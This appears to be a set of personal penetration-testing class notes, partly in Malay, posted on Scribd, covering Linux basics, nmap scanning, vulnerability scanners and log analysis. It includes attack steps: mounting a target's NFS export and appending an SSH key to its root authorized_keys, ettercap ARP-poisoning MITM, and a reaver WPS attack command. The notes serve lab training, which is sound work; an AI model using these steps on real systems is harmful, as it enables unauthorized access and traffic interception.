0% found this document useful (0 votes)
42 views4 pages

Nota Security Testing - LINUX

This document provides an overview of commands and tools used in penetration testing and hacking. It discusses Linux directory structures and user privileges, networking commands like ping and nmap, vulnerability scanning tools like Nessus, methods for accessing remote systems like SSH key generation, wireless hacking tools like Reaver, and analyzing log files on Linux and Windows systems.

Uploaded by

hairudin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
42 views4 pages

Nota Security Testing - LINUX

This document provides an overview of commands and tools used in penetration testing and hacking. It discusses Linux directory structures and user privileges, networking commands like ping and nmap, vulnerability scanning tools like Nessus, methods for accessing remote systems like SSH key generation, wireless hacking tools like Reaver, and analyzing log files on Linux and Windows systems.

Uploaded by

hairudin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

vulnhub : https://www.vulnhub.

com/

C:\ = / --> root

/ -
1. bin - any program you can run
2. sbin - any program with root priviledge
3. opt - config file
4. etc - config
5. tmp - temporary data

id = 0 is the most powerfull user

clear - to clear
whoami - to check who
id - to check id

ping -c 4 172.21.0.34 --> to ping sebanyak 4 kali

*tenable nessus boleh cari vulnerabality yang ada


*openVAS

how to start:

scan the target host


identify entry point

1. nmap 172.21.0.34 (to check semua open port)


2. nmap -A 172.21.0.34 (nak cari all services)
3. log in as SU
4. netdiscover (tocheck ada tak computer lain dalam jaringan)
5. ipconfig
6. nmap -sP 172.21.0.75/23
7. nmap -sU 172.21.1.1 -p 161
8. rpcinfo 172.21.0.34 (nak tahu service ape yang tgh running, (jalan)
9. showmount -e 172.21.0.34 (nak tgk folder ape yang dah share)

ssh-key
- create public and private key
#ssh-keygen
- * how to check ssh-keygen yang dah create
#cd /root/.ssh
#ls
- id_rsa (kunci) dan id_rsa.pub (mangga)
- to open key
#cat id_rsa.pub
#cat id_rsa
-create satu folder
#mkdir /tmp/hack
# mount -t nfs 172.21.0.34:/ /tmp/hack/ (to check symlink)
#df (to check either dah connected ke tak)
# cat id_rsa.pub >> /tmp/hack/root/.ssh/authorized_keys (copy public key ke server)
(tak boleh guna arahan copy or move)

sudo apt-get update


sudo apt-get upgrade
sudo apt-get install etherape
etherape
nmap -vvv -A ip address
nmap -vvv -A 172.21.0.34

arp: address resolution protocol

ettercap -G ; click button accept


cari tiga titik - scan for hosts -
MITM menu - ARP poisoning - sniff remote connection
arp -a

bettercap
- net.probe on

bettercap -C

SIEM - centralized (splunk), agent based (wazuh)


SOC - operations
SIC - intelligence
SOAR - security orchestration automation response

log dalam linux:


access log
#file access.log
#wc -l access.log (word count)
#head -n 2 access.log (sample 2data dari atas)
#tail -n cut -s.log (sample 2data dari bawah)
#cat access.log | cut -d " " -f 1 (extract data dari field 1)
#cat access.log | cut -d " " -f 1 | sort - (nak keluarkan cuma ip yang unik shj)
#cat access.log | cut -d " " -f 1 | sort - >> output.txt (simpan file as
output.txt)
#nl output.txt (membuat numbering)

#cat output.txt head -n 50


go to web >> https://app.ipapi.co/bulk/

maxmind

**log dalam windows:


event viewer - security - save event as:
online: upload di https://app.gigasheet.com/

4688: malware
4670: unauthorized access
4672: admin authorization
1006 & 1007 : event yang ada connection to antivirus

** to download sample log


https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential
%20Access/4794_DSRM_password_change_t1098.evtx

** type of attack
https://attack.mitre.org
WIRELESS: 802.11 a/b/g/n/ac/6/7
-WPS pin
- reaver in kali linux (reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv)

HACK5.org (https://shop.hak5.org/)
- WiFI pineapple

https://www.ekahau.com/
https://ekahau-heatmapper.software.informer.com/1.1/ ( to identify signal strength)
https://www.netspotapp.com/

You might also like